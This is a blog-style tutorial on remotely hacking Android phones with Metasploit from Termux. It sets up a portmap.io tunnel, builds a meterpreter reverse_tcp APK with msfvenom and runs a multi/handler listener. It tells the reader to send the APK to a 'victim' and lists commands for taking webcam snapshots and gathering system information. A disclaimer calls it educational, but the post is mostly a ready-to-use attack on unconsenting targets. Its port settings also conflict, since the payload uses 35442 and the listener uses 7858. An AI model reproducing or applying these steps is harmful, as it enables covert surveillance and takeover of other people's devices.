Hack Any Android From Anywhere Over Internet | Metasploit

So, today I’ll show one of the most easy and famous methods to hack Android devices using Metasploit. According to Wikipedia, “The Metasploit Project” is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development”. Basically, Metasploit is a Framework providing a Pentesting software platform for Developing, Testing and and Executing exploits. Likewise, MSFVenom, a subpart(Framework Instance) of Metasploit, an integration of two original individual framework instances, msfconsole and msfencode. Just remember it simply helps to create extremely powerful Malicious Payloads(not just for Android hacking but for a hell lot more!) and the ability to encode them.

Nowadays mobile users are increasing day by day, the security threat is also increasing together with the growth of its users. Our tutorial for today is how to Hacking Android Smartphone Tutorial using Metasploit. Why we choose android phone for this tutorial? simply because lately android phone growing very fast worldwide.

Android is an operating system based on the Linux kernel, and designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices.

Requirements

• Android 5.0
• TermuX Android App (Download it from Play Store
•   Installed Metasploit Framework in TermuX
• Active Internet/WiFi Connection
• TermuX should be allowed to use External Storage (For this only enter this command only at once: "termux-setup-storage")

How To Make LHOST And LPORT Server For Follow The Step>>>>

1.      First Open Chrome Browser And Enable The Desktop Mode By Taping Three Dots On Top The Right Side Of The Browser And Enable Desktop Mod.

2.      Open portmap.io Website Just Register& Login Your Account.

3.      After Open Portmap Site you can see a CONFIGURATION click on that and Fill There any name, select OPEN VPN, select TCP, leave the 4th box leave Blank.

4.      Now After That You Can See GENERATE At The End Of The Page Just Click On The Download Button And Download Automatically Starts Now Here You Can See A Small File Has Been Downloaded After That .

5.      Now At the End of the Same Page You Can See CREATE Button Just Click On That.

6.      At The Top Of The Web, You Can See MAPPING RULES Just Click On It; Just Add Any Number In The Place PORT ON YOUR PC And Click On CREATE.

7.      Now Go To Play Store And Search OPEN VPN FOR ANDROID And Download It .

8.      Open App  At The Top Right Side You Can See + import button Now Click On That And Select roysfan.first.ovpn   ( Recently Downloaded File From Portmap)

9.      Click on roysfan.first.ovpn a new message arrives and asks you to allow now allow that by clicking OK after that a tunnel starts.

10.  Now Open portmap.io Web In Chrome And You Can See A Tunnel Which You Created Now In That Copy These Things Ex :- Roysfan-55165.Portmap.Host And Copy PORT:- 35442

How To Generate Payload  In Termux Terminal Follow The Step>>>>>

1.      $ ls

2.      $ cd metasploit-framework

3.      $ ./msfvenom -p android/meterpreter/reverse_tcp LHOST= roysfan-55165.portmap.host  LPORT=35442 R > /sdcard/playload.apk

4.      Wait until payload ready....!!

How To Use Playload & Exploit Follow The Step >>>

Open 1st Session And Apply These Commands

$ cd metasploit-framework

$ ./msfconsole

Open New (2nd) Session And Apply These Commands

$ pg_ctl -D $PREFIX/var/lib/postgresql start

Now Come Back To (1st Session) In Which You Opened Metasploit Now Apply These Commands

$ db_status

$ use exploit/multi/handler

$ set payload android/meterpreter/reverse_tcp

$ set lhost Roysfan-55165.portmap.host

$ set lport 7858

$ exploit

Now Go To Ur Internal Storage And Search The Payload Which You Have Been Created Now Send This To Your Victim Mobile And Let Him Open It . Now The Work Has Been Done You Can See The Session Started Message Now You Can Do Whatever You Like To Do.

Check Some Commands

$ sysinfo

$ check_root

$ webcam_list

$ webcam_snap

 And more dump commands...!!!!

*NOTE** "THIS IS FOR EDUCATIONAL PURPOSE ONLY. I AM NOT RESPONSIBLE FOR ANY ILLEGAL ACTIVITIES DONE BY YOU IN ANY UNETHICAL MANNER"

Checkout YouTube Video 

Thanks for Reading Our Post  & feel free to ask and question regarding this post.

Donate Now

If you like our work and our content then you can support us by donating money.

 If you donate then our services will be available free to everyone and even it helps us to improve our services.